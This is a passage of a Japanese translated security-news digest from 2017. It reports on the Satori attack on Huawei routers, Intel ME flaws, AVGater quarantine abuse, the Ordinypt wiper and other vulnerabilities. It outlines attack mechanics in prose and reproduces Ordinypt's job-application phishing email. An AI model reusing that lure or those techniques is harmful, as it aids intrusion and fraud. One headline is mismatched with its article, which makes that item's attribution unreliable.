     ファーウェイ攻撃に先立つNexus Zetaの投稿の一つが、以下である。

     「こんにちは、私はMiraiボットネットをコンパイルするために私を助けてくれる人を探しています。私は、あなたが実行しなければならない全てのことは、それをコンパイルし、1 テラビット/秒のアクセスができることであると聞かされた。どうかMirai telnetボットネットをセットアップするために私を助けてください。」

     OkikuもしくはSatoriの攻撃は、今迄のMiraiの変種とは異なり、telnetベースのブルートフォース攻撃には依存していない。代わりに、この新しい変種は、ファーウェイHG532デバイス中の今迄未知のCVE-2017-17215脆弱性を悪用するためにポート37215への攻撃を実行している。
     この攻撃は、悪意あるペイロードをダウンロードし、ファーウェイのルータ上で実行するコマンド インジェクションに関連している。
     このフローは、Universal Plug and Play(UPnP)のこのルータの用法とTR-064(【訳注】 Technical Report 069 の省略形)の技術レポート仕様に結び付いている。TR-064は、埋め込まれているUPnPデバイスをローカルネットワークに追加するのを簡単にするために設計された仕様である。
     「このケースでは、ファーウェイ デバイス中のTR-064実装は、37215ポート(UPnP)を介してWANに晒された」と、研究者達は記述している。UPnPフレームワークは、ファームウェア アップグレード アクションを実行できる"DeviceUpgrade"をサポートしている。
     この脆弱性は、リモート管理者がシェル メタキャラクタ(【訳注】 *、? 等)を挿入することによってDeviceUpgradeプロセス中で任意のコマンドを実行することを可能にする。
     「これらが実行されると、この脆弱性悪用プログラムは、Default HUAWEIUPNPメッセージを戻し、『アップグレード』が開始される」と、研究者達は記述している。
     このペイロードの主目的は、手作業で細工されたUDPもしくはTCPパケットで、ターゲットを洪水にするように、そのボットに命令することである。
     「洪水アクションに使用されるパケットの数と、それらに随伴するパラメータは、C&Cサーバから送信される。また、このC&Cサーバは、サブネットアドレスと幾つかの有益なビットを使用して攻撃やサブネットの個別アドレスを渡すことができる」と、研究者達は発言している。
     ファームウェアによると、攻撃緩和策は、ルータの組み込みファイアーウォールの設定、Defaultパスワードの変更、キャリア側でファイアーウォールを使用することを含んでいる。
     Check Pointは、発見された脆弱性が、どのようにしてNexus Zetaの所有になったのかは依然として不明であると発言している。
     「昨年の他のもの同様にこのケースでも見られるように、悪用可能で貧弱なIoTセキュリティとリークされたマルウェアコードの結合は、未熟なハッカーが使用する時には、悲惨な結果を招くことことは明らかである」と、Check Pointは発言している。


    Windows 10 Hello顔認識は写真で誤魔化すことが可能
    The Register : Security (2017/12/20)
     あなたが最近のWindows 10 Creators Updatesをスキップしているのであれば、今、方針を変更しなさい。この顔認識セキュリティ機能(Hello)は、写真で欺くことができる。
     この脆弱性は、Full Disclosureでドイツの侵入テストチームSyssによってアナウンスされた。
     あなたが10月に出荷された修正バージョン(builds 1703 もしくは 1709)をインストールしている場合でさえ、顔認識は、この攻撃に耐性を持たせるにはスクラッチからセットアップしなければならない。
     この投稿で説明されているこの「簡単なスプーフィング攻撃」は、「認定ユーザの修正され印刷された写真」(当然、正面写真)の使用に関する、あらゆる変化形が存在しているので、攻撃者はロックされたWindows 10システムにログインすることができる。
     脆弱性のあるバージョンは、そのDefault設定と、「拡張アンチスプーフィング」機能を有効にしているWindows Helloの場合の両方であると、Syssは主張している。
     「『拡張アンチスプーフィング』が有効になっている場合、標的にされるWindows 10バージョンに応じて、他の属性が付属する少し修正の異なる写真が使用されなければならないが、攻撃者にとって、この追加の努力は取るに足らないものである。」
     この研究者達は、Windows 10 Pro, build 1703及びMicrosoft Surface Pro running 4 build 1607が稼働しているDell Latitudeに対して彼らの攻撃をテストした。
     彼らはSurface Proの設定を「拡張アンチスプーフィング」に変更しようとしたが、「LilBit USBカメラは、Default設定だけをサポートし、より安全な顔認識設定で使用することはできなかった」と主張している。
     この研究者達は、三つの概念の実証ビデオを公開した。

    https://youtu.be/Qq8WqLxSkGs
    https://youtu.be/GVKKcoOZHwk
    https://youtu.be/cayqU3WCOso


    Windows 10パスワードマネージャは、ハッカーにデータを盗むことを可能にしている
    Bitdefender : Blog (2017/12/18)
     著名なGoogleの開発者は、Windows 10にDefaultでインストールされている人気のあるパスワードマネージャ中の厄介な欠陥を発見した。ハッカーは、クリックジャッキングや悪意あるコード挿入テクニックを介してユーザのパスワードを手に入れることができる。
     Google Project Zeroの研究者Tavis Ormandyは、Windows 10バーチャルマシンを弄んでいる間に、これを発見した。
     彼は、chromium.org(ChromeブラウザとChrome OSの背後のオープンソース・プロジェクトに特化されたフォーラム)上でこの脆弱性の説明を提供している。
     「私はKeeperのことを耳にした、私は、彼らが特権UIをページに挿入する方法に関するバグを少し前にファイルしたことを覚えている。私はチェックした、そして彼らは、このバージョンでもまた同じことを実行している... これは、あらゆるWebサイトが、あらゆるパスワードを盗むことを可能にするので、Keeperセキュリティの完全な情報漏洩である」と、Ormandyは記述している。
     彼は、攻撃者が任意のTwitterユーザのパスワードを盗むために、このフローを活用する方法を示す概念の実証を提供している。
     Keeperの背後にいる人々は、このニュースの噂を耳にした。彼らは、このバグを認識し、大急ぎでそれを修正した。
     「この問題を解決するために、我々は"Add to Existing"フローを削除した、そして、将来に於いて、この潜在的な脆弱性を防止するために追加のステップを取った」と、Keeperチームは、この企業のブログで記述している
     「この潜在的な脆弱性によって顧客が不利な影響を受けない場合でさえ、我々は、全ての報告されたセキュリティ問題、脆弱性、バグレポートを深刻に受け止めている」と、「セキュリティと顧客情報とデータの保護は、Keeperの再優先事項である。我々がこの問題を通知された時から24時間以内に、それを解決し、自動的な拡張のアップデートを顧客に発行した。」
     今まで、この企業のモバイルとデスクトップ アプリケーションは影響を受けないままであり、このバグによって影響を受けたとする顧客からのレポートは存在していない。ブラウザ拡張だけに脆弱性があるようだ。
     このバグの公開以来、Edge, Chrome, FirefoxのKeeperブラウザ拡張は、修正に関する自動アップデートを受け取っている。しかしながら、Safariユーザは、Keeperのダウンロードページを訪問しバージョン 11.4.4(もしくは最新版)を手動でダウンロードしインストールする必要がある。
     このようなフローはパスワードマネージャの目的全体を打ち負かすし、Windows 10がユーザのパスワードを格納するために、このソフトウェアを信頼しているという事実は、Ormandyの発見をより心配なものにしている。願わくば、Keeperチームが将来を通じてこのようなバグを作らないことを。


    Synapticキーロガーが存在するHP(ヒューレットパッカード)のラップトップであるか否かをチェックし、そのキーロガーを削除する方法
    BleepingComputer : News>Security (2017/12/11)
     先週、BleepingComputerは、一部のHPのラップトップが、どのようにしてSynapticキーボードドライバの特定のバージョン中にキーロガー(実際には、デバッグトレース)を持つことになったかをカバーした。このキーストロークを記録するドライバーの能力をDefaultで無効にしても、依然として、HPラップトップの全てのユーザが修正しなければならない深刻なセキュリティリスクがある。
     我々が、この特定のドライバに関してあなたのシステムをチェックする方法の説明を始める前に、このキーロガーが悪意ある理由から、そのドライバ中に配置されていなかったことに注目することは重要である。これは、開発している間にそのドライバ中のバグの発見を支援するためにドライバ開発者によって使用されていたものではないように思われる。残念ながら、ミスによって、このデバグトレース関数は、製品がリリースされる前にこのドライバから削除されなかった。
     そう言うわけなので、あなたがHPラップトップを所有しているのであれば、あなたのラップトップは、このデバッグトレース(もしくは、キーロガー)機能を含むドライバをインストールされている可能性がある。あなたが影響を受けるドライバを所有しているか否か確認するには、C:\Windows\System32\drivers に進み、以下に示したように、SynTP.sys ドライバのプロパティに注目しなさい。


    SynTP.sysのプロパティ

     この製品バージョン(上図のProduct version)が、19.3.11.37 16Aug16 としてリストされている場合、このキーロガー(もしくは、デバッグトレース)機能を含むドライバーをインストールされている。
     このドライバがインストールされている人々に関しては、HPのサポートページにリストされている(リンクは日本語サイトに変更しています)あなたのラップトップで利用可能な最新のドライバを即座にダウンロードしなさい。あなたが、影響を受けるバージョンをインストールされていない場合であっても、この問題は、他のバージョンにも同様に影響を与える可能性があるので、あなたのラップトップ用の最新のドライバがリストされている場合には、私はアップデートをインストールするよう提案する。
     アップデートをインストールしたら、SynTP.sysドライバは、デバッグトレースを削除されたバージョンに置き換えられ、キーログの能力はもはや存在しなくなるだろう。あなたがラップトップのソフトウェアを定期的にアプデートしているなら、このアップデートは、研究者Michael MyngがHPに対してこのバグを報告した2017年11月初めにリリースされているので、既にインストールされているかもしれない。


    Windows 7 アップデートは80248015エラーを与える。その理由と修正方法
    FossBytes : News (2017/12/08)
     ロンドンでのBlackHat Europeカンファレンスで、研究者Mark ErmolovとMaxim Goryachyは、Intel ME 11中のスタック・バッファオーバーフローのバグ(CVE-2017-5705, CVE-2017-5706, CVE-2017-5707)を明らかにした(PDF)
     これらのバグは、「そのデバイス上で実行されている殆どのデータとプロセスへの深層レベルでのアクセス」を攻撃者に与え、’God Mode’とも呼ばれる能力をONにする。
     この攻撃者は、2015年以降に出荷されたインテル-インサイド マシン上で、署名されていないコードを実行したり、周辺機器とコンポーネントの制御を奪ったり、もしくは、コンピュータをOFFにする改竄さえすることができる。このマシンは通常通り機能する(ユーザとOSは、何が発生しているのか全く知ることなく)。
     先月、Intelは、セキュリティアドバイザリでこの脆弱性について話し、それらを修正するパッチもリリースしている。しかし、これらのパッチを時宜にかなって推し進める責任を持っているのは各メーカーである。
     この研究者によると、ME(Intel Management Engine)領域に書き込みアクセス権を持つ攻撃者が、Intel MEチップのファームウェアを何とかダウングレードしたら、これらのセキュリティパッチは役に立たないものになる。
    これは、IntelがMEをチップに入れ始めた2007年に遡るので、影響を受けるデバイスのリストは拡大する可能性がある。しかしながら、ターゲットマシンに侵入するために、攻撃者は物理的なアクセスを要求するか、リモートログイン認証を盗まなければならないだろう。例えば、ターゲットマシンが、IT管理者によって管理されている企業ネットワークの一部である場合である。
     MEチップはアンチマルウェアツールの守備範囲外で操作するので、この脆弱性からユーザを守ることのできるセキュリティソフトは存在しない。喩え、オペレーティングシステムであろうとも。
     ありがたいことに、彼らのユーザのためにMEチップの脆弱性を塞ぐ気があるPCメーカーが幾つか存在している。


    Windows 7 アップデートは80248015エラーを与える。その理由と修正方法
    BleepingComputer : News>Security (2017/12/04)
     あなたがWindows 7の新しいWindows Updateを検索したなら、十中八九80248015エラーを得るだろう。このエラーは、我々のフォーラム、Microsfotフォーラム、他のサイトでも報告されており、全てのWindows 7ユーザに影響を与えている問題のようである。
     Ghacksによって収集された情報によると、このエラーは、Windows Updateによって使用されたファイル(誤って2017年12月3日を期限に設定されている)によって発生している。このファイルは有効期限切れなので、ユーザがWindows Updateを実行すると、これは、自動的に以下の何方かのエラーで失敗する。

    ・ Windowsは新しいアップデートを確認できません。このコンピュータで利用できる新しいアップデートを確認中にエラーが発生しました。エラー: コード 80248015 Windows Updateで不明なエラーが発生しました。
    ・ 現在サービスが実行されていないため、Windows Update で更新プログラムを確認できません。このコンピューターの再起動が必要な可能性があります。

     私のWindows 7のPCで実行したWindows Updateのテストでのこのエラーの例を以下に示す。


    Windows 7 Update 80248015エラー

     あなたが掘り下げたいのであれば、Windows Event Logsで類似の情報と共に複数のエラーを発見するだろうが、詳細とは言い難い。


    エラー80248015に関するWindows 7 エラーログ

     残念なことに、あなたのコンピュータの再起動やWindows Updateトラブルシューティングツールを使用しても、この問題は修正されない。
     Microsoft AnswersフォーラムのスレッドでArgHereBeDragonsと名乗るユーザによると、このエラーはC:\Windows\SoftwareDistribution\AuthCabs\authcab.cabファイルで発生しているようである。このCABファイルは、2017/12/03 11:59:25(日本時間 2017/12/04 04:59:25)を期限とするauthorization.xmlと呼ばれるXMLファイルを含んでいる。ユーザが、この期限時刻の後にWindowsをアップデートしようとすると、Windows Updateは、このファイルの期限を原因として失敗する。


    期限切れのファイル

     残念ながら、これらのファイルはMicrosoftによってデジタル署名されているので、このXMLファイルを編集することや、期限の日付を延長することは不可能であり、このファイルへのあらゆる変更は、このファイルをWindows Updateで使用されないようにしてしまうだろう。


    署名されているauthcab.cabファイル

     この問題を修正するには、あなたのコンピュータの時計を2017年12月02日に戻し、もう一度Windows Updateを実行しなさい。私の場合は、これでWindows Updateをダウンロードしインストールすることができた。

    2017/12/04 Update
     一部の人達は、Born City(【訳注】 Born's Tech and Windows Worldのサイト)が以下で説明している修正を使用すると、hourglass loop(【訳注】 砂時計表示の無限ループ)もしくは、白画面表示を発生すると報告している。あなたにとって時刻の変更が動作するのであれば、現時点では、この方法が安全な修正方法かもしれない。

     あなたが、Windows Update設定変更画面で「Windowsの更新時にMicrosoft製品の更新プログラムを入手し、新しいオプションのMicrosoftソフトウェアについて確認する」をOFFにした場合に、この問題を修正するかもしれない動作する可能性のある他の修正が、テクノロジサイトBorn Cityによって発見されている(【訳注】 2017/12/05 13:04時点で、このリンクはアクセスできない状態です)。


    この設定をOFFにする

     これは単なる応急措置である。最終的には、我々は、Windows 7ユーザがauthcab.cabファイルをダウンロードしアップデートするためのMicrosoftの緊急の修正のリリースを待つ必要がある。


    Acer, Dell, Fujitsu, HP, Lenovo, Panasonicは、Intel MEセキュリティバグの影響を受ける
    BleepingComputer : News>Security (2017/11/23)
     Acer, Dell, Fujitsu, HP, Lenovo, Panasonicは、Intelチップセットを組み込んだ製品が、8つのセキュリティフロー(ハッカーがデバイスを乗っ取ることを可能にする)の影響を受けることを確認した。
     Intelは、月曜日、セキュリティ・アドバイザリ中で、これらのフローに関する詳細を公開した。8つのバグは、Intel Management Engine (ME), Intel Server Platform Services (SPS), Intel Trusted Execution Engine (TXE)のようなIntel CPUコア・テクノロジに影響を与える。
     Intelは、以下のIntel製品中にこれらのテクノロジを配備していた。

    6th, 7th & 8th Generation Intel Core Processor Family
    Intel Xeon Processor E3-1200 v5 & v6 Product Family
    Intel Xeon Processor Scalable Family
    Intel Xeon Processor W Family
    Intel Atom C3000 Processor Family
    Apollo Lake Intel Atom Processor E3900 series
    Apollo Lake Intel Pentium
    Celeron N and J series Processors

     以下のファームウェア・バージョンを使用している製品だけが影響を受ける。

    ME firmware versions 11.0/11.5/11.6/11.7/11.10/11.20
    SPS Firmware version 4.0
    TXE version 3.0

     多くのPCとNotebook企業は、彼らが世界中のユーザーに販売したサーバ、デスクトップ、ノートブック モデルに脆弱性のあるファームウェア・バージョンを実行しているCPUを組み込んでいた。
     Intelが、アドバイザリを公開した時点では、Intelベースのデスクトップとラップトップに脆弱性のあるファームウェア・バージョンを、どの製品に配備したのかは明らかになっていなかった。

    900を超えるPCとLaptopモデルが影響を受ける

     週が進むにつれて、新しい情報が明るみに出てきた。以下のベンダーは、脆弱性のあるファームウェアを実行しているIntel製品が使われている製品のリストを公開した。

    企業名 モデルの数 パッチ
    Acer 242 なし
    Dell 214 なし
    Dell Server 16 なし
    Fujitsu(PDF) 165 なし
    HPE Server 数は明らかではない 一部あり
    Intel 34 なし
    Lenovo 222 一部あり
    Panasonic 12 なし

     全てのベンダがパッチをリリースしているわけではない、そして、ユーザは、利用可能になったら、彼らのデバイス用のファームウェアアップデートをダウンロードするために、これらのページを訪問するようにしなさい。
     あなたが、サーバ、デスクトップ、もしくはラップトップ・ベンダや、これらのページのモデルを見つけ出せないのであれば、Intelは、ユーザのPCをスキャンし、最近公開されたバグに影響を受けるか否かを、そのユーザに告げるWindowsとLinux用のツールをリリースしている。Windowsに関しては、ユーザはスキャン結果を閲覧するために、Intel-SA-00086-GUI.exeファイルを実行しなさい(以下の画像参照)。


    Intel検出ツール

     サイバーセキュリティ企業Rapid7も、これらのフローのリスクを強調するために、企業顧客用の警告を発光している。Rapid7によると、これは専門家が以下のことを実行するために使用される。

    ・ ME/SPS/TXEに成りすます、それ故、ローカル・セキュリティ機能の証明正当性に影響を与える
    ・ ユーザとオペレーティングシステムの可視性の外で任意のコードをロードし実行する。
    ・ システムクラッシュもしくはシステム不安定を発生させる


    LibXLライブラリ中の複数の脆弱性はRCE攻撃に対してドアを開いている
    Kaspersky : ThreatPost (2017/11/17)
     研究者は、Excelファイルを読むために使用されるLibXL C ライブラリ中に7つの脆弱性を同定した。夫々の脆弱性は、共通脆弱性評価システム(CVSS)スケールでの重大度で8.8と評価されている。
     今週このフローを公開したCisco Talosの研究者によると、攻撃者は夫々の脆弱性を悪用でき、特別に細工されたXLSファイルを使用して、リモートコード実行(RCE)攻撃を実行することができる。
     「LibXLは、Windows, Mac, Linuxをサポートしている。これは、Excel 97 からXLSファイルの現行バージョンまでのMicrosoft Excelファイルフォーマットのファイルを読むことができる」と、Cisco Talosの研究者は発言している。
     「このライブラリは、CRANレポジトリを介してRプログラミング言語中にインストールすることのできる'readXL'パッケージによって使用される」と、研究者は記述している。彼らは、LibXLが、xls2csvツール(スプレッドシートのテキストファイルを再びコード化し、コンマで区切られた値としてそれらを保存するコマンドライン・スクリプト)の一部であるとも追加している。
     夫々の脆弱性は、Cisco Talosチームの研究者Marcin Nogaによって発見された。
     7つの脆弱性の一つ(CVE-2017-2896)は、フィッシングキャンペーンを介して悪意あるXLSファイルを送信することを敵対者に可能にし、開かれると、リモートコード実行中の結果としてターゲットのシステムでメモリ損壊の引き金を引くだろう。
     「悪用可能な境界を越えた書き込み脆弱性は、libxls 1.4のxls_mergedCells関数中に存在している」と、Cisco Talosの研究者は記述している。
     二つ目の脆弱性(CVE-2017-2897)は、libxls 1.4のread_MSAT関数中に存在していると、研究者は発言している。
     研究者によると、「特別に細工されたXLSファイルは、リモートコード実行の結果として、メモリ損壊を発生させることができる。攻撃者は、この脆弱性の引き金を引く悪意あるXLSファイルを送信することができる。」
     脆弱性CVE-2017-12110に関しては、このフローは、LibXL 1.4のxls_appendSST関数中に存在する悪用可能なInteger(単整数型)オーバーフロー脆弱性に結び付けられると、研究者は発言している。Integerオーバーフローは、計算処理が、それを格納するInteger型の最大サイズを超える値を生成する時に生じる条件であると説明される。
     他の脆弱性は、スタックベース バッファオーバーフロー(CVE-2017-2919)、二つのIntegerオーバーフロー(CVE-2017-12108CVE-2017-12109)、そして、境界外書き込み(CVE-2017-12111)のバグである。
     Cisco Talosによると、この脆弱性群を解決するためのアップデートは、LibXL SVNリポジトリを介してのみ利用可能である。


    アンチウィルス・エンジン設計フローは、システムに噛みつかれる手助けをする
    BleepingComputer : News>Security (2017/11/10)


    画像をクリックすると拡大します。

     幾つかのアンチウィルス製品は、今迄に検出されたマルウェアをユーザのオペレーティングシステムの重要な部分に送り出す「隔離から復元」機能の悪用をマルウェアやローカルの攻撃者に可能にする設計フローの影響を受け、マルウェアが昇格した特権でブート永続性を取得することを手助けする。
     オーストリアのサイバーセキュリティ企業Kapschのセキュリティ監査役Florian Bognerが、このフローを発見した。そして、彼は、AVGaterのコードネームで、このフローを追跡し続けている。

    一部のアンチウィルス企業は、アップデートをリリースしている

     Bognerは、彼がテストし脆弱性を発見した全てのアンチウィルスメーカーに通知したと発言している。本日、この研究者は、一部の企業がアップデートをリリースした後、彼の発見を公開した。
     このリストには、Trend Micro, Emsisoft, Kaspersky Lab, Malwarebytes, Ikarus, Check PointのZone Alarmが含まれている。
     彼は他の企業も、数日のうちに修正をリリースするだろうと発言し、彼がテストしていない他のアンチウィルス・エンジンに脆弱性が存在している可能性を除外しないとも発言している。

    AVGaterはどのように動作するのか

    このフローがどのように動作するのかをより良く理解するために、脆弱性攻撃が成功するシナリオを簡単に解説する。

    Step 1 - ユーザがマルウェアで感染させられる。

    Step 2 - AVエンジンがマルウェアを検出する。

    Step 3 - AVエンジンがマルウェアを隔離室に移動する。

    Step 4 - 非管理者権限のローカル攻撃者が、影響を受けるシステム上で脆弱性悪用プログラムを実行する。これは、隔離されているサンプルの本来のファイルの位置を操作するために、NTFSディレクトリ・ジャンクションを使用する。

    Step 5 - 攻撃者は、「隔離からの復元」操作を開始する。。

    Step 6 - 感染したファイルは、その場所に送り返されるが、NTFSジャンクションは、そのファイルを C:\Windows 内部の重要なフォルダに中継する。非管理者権限のユーザは、このフォルダの内部にあるファイルをコピーできないが、アンチウィルス・プログラムは、システム権限の下で動作している。このことは、隔離室から復元されたファイルが、エラーや警告を発生させることなしに、そのフォルダに送られることを意味している。

    Step 7 - Windowsのサービスの一部やコアプロセスは、特定のWindowsディレクトリに格納されている全てのDLLをロードするように設計されているため、ユーザが彼のPCを次回に再起動した時、今まで隔離されていたファイルは、Windowsサービスやホワイトリストされたアプリケーションとしてスタートアップで実行される。

     攻撃全体は、ブート永続性と特権の昇格の両方を可能にしているため、恐ろしく狡猾であるが、そのマシンに物理的にアクセス可能(殆どの場合、重大な制限)な攻撃者に依存している。
     それであるにも拘わらず、AVGataを利用できるとするシナリオがある。例えば、ユーザがコンピュータを共有している、会社、教育機関、政府組織のような共有環境、WindowsベースのATM等である。
    EmsisoftとMalwarebytesのアンチウィルスを脆弱性攻撃する「概念の実証」コードを公開したBognerは、ユーザが、自身の所有するアンチウィルス製品を常にアップデートすることによって、企業環境の場合では、隔離室からファイルを復元することをユーザに許可しないようにすることによって、AVGataを防御することができると発言している。


    Ordinypt身代金要求型マルウェアは故意にファイルを破壊する。現在のターゲットはドイツ
    BleepingComputer : News>Security (2017/11/09)
     Ordinyptと名付けられた身代金要求型マルウェアの新種は、現在ドイツをターゲットにしている。そして、ユーザのドキュメントを暗号化する代わりに、この身代金要求型マルウェアは、ランダムなデータでファイルを書き改める。
     この身代金要求型マルウェアは、その脅迫文の一つが、ID-Ransomwareにアップロードされた後、Michael Gillespieによって最初に発見された。この月曜日、G Dataのセキュリティ研究者Karsten Hahnは、サンプルを解析し、ドイツ語で書かれたeMailを介してドイツ人ユーザだけをターゲットにし、間違いのないドイツ語で脅迫文が配布されていることを発見した。
     最初、Michaelによって発見された時、この身代金要求型マルウェアは、適切な名前がなくてHSDFSDCryptと名付けられたが、G DataによってOrdinyptに変更された。
     原初のPetya身代金要求型マルウェアが配布される方法に類似して、Ordinyptもまた、求人広告に応募するために送信された履歴書であるかのように装っている。これらのeMailは、二つのファイル(履歴書を送信しているかのような婦人のJPG画像と、履歴書と職務経歴書を含むZIPファイル)を含んでいる。
     これらの添付ファイルは、Viktoria Henschel(Bewerbungsfoto.jpgとViktoria Henschel)、Bewerbungsunterlagen.zipと名付けられている。


     このZIPアーカイブは、それらが異なるファイルであると思わせてユーザを欺く、使い古された二重拡張子とカスタムアイコン・トリックを使用する二つのEXEファイルを含んでいる。このケースでは、PDFファイル。
     Defaultでファイル拡張子を非表示にしているWindows PCでは、このEXE拡張子は表示されない。そして、ユーザはPDF部分だけを見るだろう。ユーザを騙し、このファイルが合法的なPDFであり、実行ファイルではないと信じさせるには十分である。


    Ordinyptはファイルをランダムなデータで置き換える

     何れかの実行ファイルを実行することは、Ordinypt身代金要求型マルウェア(いっそのこと、Ordinyptワイパー)を起動する。Ordinyptは、実際にはワイパーである。何かを暗号化して悩ませるのではなく、ファイルをランダムなデータで単に置き換えるだけなので、身代金要求型マルウェアではない。
     リバースエンジニアPhilipp Mackensenによると、Ordinyptは、ファイルの内容をランダムに生成した文字列(大文字、小文字、数字で構成される)で置き換える。

    9 Nov
    Army Nael B. Leido @armynaelによる投稿

    Replying to @demonslay335 and 4 others
    It looks like its not encrypted before. It didn't even read the content of the file looking on its code. Also tested 300MB+ bait file and was replaced with a 21KB (very unlikely to be encrypted copy).

    Philipp Mackensen @PMackensenによる投稿
    File names and content are generated by the same function (only needs a length as input) which randomly generates a string that consists of uppercase, lowercase and numeric characters . File size can differ between 8KB and 24KB (also random). Doesn't encrypt .png files tho.

     Philippは更に、このワイパーは、あらゆる他の身代金要求型マルウェアのように、ファイルの検索を実行するが、「実際にはゴミ・ファイルである"pseudo-encrypted-file"(擬似暗号化ファイル)を作成し、その後、オリジナルのファイルを削除するだけである」と、Bleeping Computerに告げている。Philippは更に、このマルウェアがワイパーであるという事実を隠蔽している間、このマルウェアは、ほぼ間違いなく、身代金要求型マルウェアのように動作していると、続けている。
     ランダムなデータを生成するために使用されているものと同じアルゴリズムが、14の英数字で構成される新しい"pseudo-encrypted-file's"名を生成するために使用されてもいる。


     Ordinyptは、新しいファイルが時々オリジナルのサイズの半分を超えるが、その有害な性質を隠そうともしない。


     Ordinyptは、ファイルを破壊した全てのフォルダに脅迫文をドロップする。この脅迫文は、Wo_sind_meine_Dateien.htmlと名付けられている。英文に翻訳するとWhere_are_my_files.html.(私のファイルは何処)である。


    Ordinyptは身代金要求型マルウェアを装うワイパーである

     故意にデータを破壊する挙動は、脅迫文がコード化されていることからも明らかである。
     通常、身代金要求型マルウェア株は、感染IDとBitcoinアドレス、犠牲者がその身代金要求型マルウェアのオペレータにコンタクトし、身代金の支払いを確認するためのダークWeb URL、もしくは、eMailアドレスを表示する。
     Ordinyptは、感染IDをリストしないし、身代金要求型マルウェアの作者がIDのようなものを抽出できるファイルを要求することもない。
     その代わりに、Ordinyptの脅迫文は、JavaScript関数を使用し、101のハードコードされたウォレット・アドレスのリストからランダムにBitcoinのアドレスを選択する。


    JavaScript(画像をクリックすると拡大します。)


    ハードコードされたウォレット・アドレス(画像をクリックすると拡大します。)

     更に、この模造身代金要求型マルウェアの作者に接触し、支払いを確認する方法は存在しない。全ての証拠は、誰かが、コンピュータに故意にダメージを与えるために、Ordinyptをコーディングしたことを指摘している。
     求人eMailを介して人事部をターゲットにすることは、ドイツを本拠とする一部の企業の業務に損害を与えるための意図的なキャンペーンであることを雄弁に語っている。
     Ordinyptは、身代金要求型マルウェアを装う最初のワイパーではない。最も有名なのは、6月にウクライナを攻撃し、速やかに世界中に拡散した模造身代金要求型マルウェアNotPetyaである。

    IOC

    Ordinypt / HSDFSDCrypt Hash:

    SHA256: 085256b114079911b64f5826165f85a28a2a4ddc2ce0d935fa8545651ce5ab09

    Ordinypt / HSDFSDCryptスパムeMail文(Bleeping Computerによる英文翻訳)

    Dear Sir or Madam,

    Enclosed you will receive my application for your job advertised at the Employment Agency. Please see my detailed and attached application documents for the reasons why I am able to fill the vacant position optimally and that your experience has many advantages for your company.

    I'm glad if I can introduce myself once again.

    Best regards,

    Viktoria Henschel

    Ordinypt / HSDFSDCrypt脅迫文
     ドイツ語のみ。英文翻訳が行われていないので省略。


    ブラザーのプリンターは、RDoS(リモートDoS)攻撃を許容する
    Kaspersky : ThreatPost (2017/11/07)
     ブラザーによって製造販売されているネットワーク機能を持つ個人消費者並びに企業向けプリンターは、未パッチの脆弱性を含んでいる。攻撃者は、この脆弱性を悪用して、そのデバイスにDoS攻撃を発生させることができる。
     月曜日、TrustwaveのSpiderLabsの研究者は、最初の開示後およそ一月、ブラザーに連絡をとり、多くの成果のない試み(10月3日のサポートとのライブチャットを含む)の後、月曜日に、この問題を公開した。Threatpostによるコメントの要求は、無視されたまま公開された。
     この脆弱性は、Debut埋込型Webサーバが付属する全てのブラザー製プリンタが影響を受ける、そして、この脆弱性は、当該プリンタに単一の不正な形式のリクエストをすることで悪用することができると、Trustwaveは発言している。TrustwaveのThreat Intelligence(脅威情報)マネージャKarl Siglerは、Debut Webフロントエンドは、15年経っており、バージョン 1.20と、それ以前のバージョンが影響を受けると、発言している。
     「ネットワークの観点から、当該プリンタへの攻撃は、通常のHTTPトラフィックのようにみえる。この攻撃は、DoSを達成するために、数分毎に単一のリクエストを送信しているだけである」と、「攻撃者全てにとって必要なことは、当該プリンタが、インターネットにアクセスできることである。そうでなければ、攻撃者は、ターゲットのネットワークへのアクセスを取得する必要がある(ソーシャルネットワークが思い浮かぶ)」と、SiglerはThreatpostに告げている。
     Trustwaveによって行われたShodan検索によると、ブラザーのプリンタの小さなパーセンテージではあるが、オンラインに接続されているデバイス14,989台が影響を受けると、Siglerは発言している。
     「大抵の場合、攻撃者は同一のネットワーク上に存在する必要がある」と、Siglerは認めている。
     攻撃は、不正な形式のHTTP POSTリクエストを当該プリンタに送信することによって実行される。攻撃者は、サーバにアクセス不可能であり印刷できないことを意味する応答である一般的な500サーバ・エラーを受け取るだろう。
     「残念ながら、この問題に関してブラザーに再三連絡をとったにも拘わらず、ペンディングされているパッチはないようである。この問題を軽減するには、管理者は、彼らのデバイスに委ねることである」と、「厳密なアクセスコントロールを、ここに課し、ファイアーウォールと、アクセスを必要とする管理者にのみWebアクセスを制限するための類似のデバイスを使用することは、ここでの脅威を軽減する支援となるだろう。残念ながら、貧弱なアクセスコントロールが、よくありがちである」と、Trustwaveはステートメントで発言している。  さて、この問題は、パッチがされないままになるようである。Siglerは、アップデートがブラザーによって作成されたとしても、多分、手動で配備する必要があるだろうと発言している。これは、セキュリティに関して自動化されたメカニズムとアップデート機能を持っていない他の接続デバイスにも、ありがちなことである。Miraiのような他の例もあり、攻撃者は、DDoS攻撃で損害を与えるために、この問題を悪用するにはあまりに幸福すぎた。
     「一部の人々は、DoS攻撃を単なる妨害として片付けるが、この攻撃は、リソースを専有し、あらゆる組織の生産性を低下させることができる。この攻撃はまた、組織への個人的攻撃の一部としても使用される」と、「例えば、攻撃者は、このようにDoS攻撃を起動し、次に、この問題を修正するために呼ばれた『専門家』としてその組織に現れることができる。専門家に扮することは、攻撃者が決してリモートからアクセスできなかったITリソースに、直接物理的アクセスする事を可能にする」と、Trustwaveは発言している。


    TorMoil脆弱性は、Torブラウザユーザの実IPアドレスをリークする
    BleepingComputer : News>Security (2017/11/03)
     Tor Projectは、ユーザの実IPアドレスをリークする脆弱性を修正するために、MacとLinux上のTorブラウザに関するセキュリティアップデートをリリースした。
     この脆弱性は、We Are Segment(サイバーセキュリティと倫理的ハッキングに特化したイタリア企業)のCEOであるFilippo Cavallarinによって発見された。
     Cavallarinは、先週、Tor Projectにこの問題(彼によってコードネームTorMoilと名付けられた)を内密に通知した。Tor Project開発者は、修正をリリースするためにFirefoxチーム(TorブラウザはFirefoxをベースにしている)と共同作業した。
     本日、Torチームは、この脆弱性を解決したバージョン 7.0.9 をリリースした。Torブラウザ 7.0.9 は、MacとLinux上でのみ利用可能である。Windows上のTorブラウザは影響を受けない。

    IPリークは、"file://"リンクで発生していた

     Cavallarinによると、この問題は実際には、Firefoxがfile:// URL を取り扱う方法におけるFirefoxのバグである。この問題はFirefoxにとっては無害であるが、Torブラウザにおいては壊滅的である。
